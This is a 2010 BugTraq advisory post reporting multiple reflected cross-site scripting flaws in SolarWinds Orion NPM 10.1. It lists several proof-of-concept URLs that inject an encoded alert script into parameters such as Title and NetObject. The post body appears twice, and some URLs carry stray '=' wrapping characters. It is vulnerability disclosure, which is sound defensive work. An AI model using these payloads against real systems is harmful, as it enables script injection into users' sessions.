BugTraq
Back to list
|
Post reply
Multiple XSS in Solarwinds Orion NPM 10.1
Dec 07 2010 05:16PM
John Blakley (john blakley gmail com)
Values placed in the URI of the browser are rendered correctly. Orion NPM
10.1 has just been released, so there is no known fix available as of yet.
Examples:
Most "variable=" that I've checked are vulnerable:
http://<server>/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813
f-231270=0225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/scri
pt%3E
http://<server>/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3E
alert%28=%27test%27%29%3C/script%3E
http://<server>/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Eal
ert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails
http://<server>/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3E
alert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&
Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yest
erday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColo
r=&ResourceID=57&ShowTrend=True&ReturnTo=
If you need more information please let me know. Is there a template I
should fill out for these reports?
If this is published, please publish under x0skel and NOT my name....
Thanks,
John
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
10.1 has just been released, so there is no known fix available as of yet.
Examples:
Most "variable=" that I've checked are vulnerable:
http://<server>/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813
f-231270=0225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/scri
pt%3E
http://<server>/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3E
alert%28=%27test%27%29%3C/script%3E
http://<server>/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Eal
ert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails
http://<server>/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3E
alert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&
Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yest
erday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColo
r=&ResourceID=57&ShowTrend=True&ReturnTo=
If you need more information please let me know. Is there a template I
should fill out for these reports?
If this is published, please publish under x0skel and NOT my name....
Thanks,
John
[ reply ]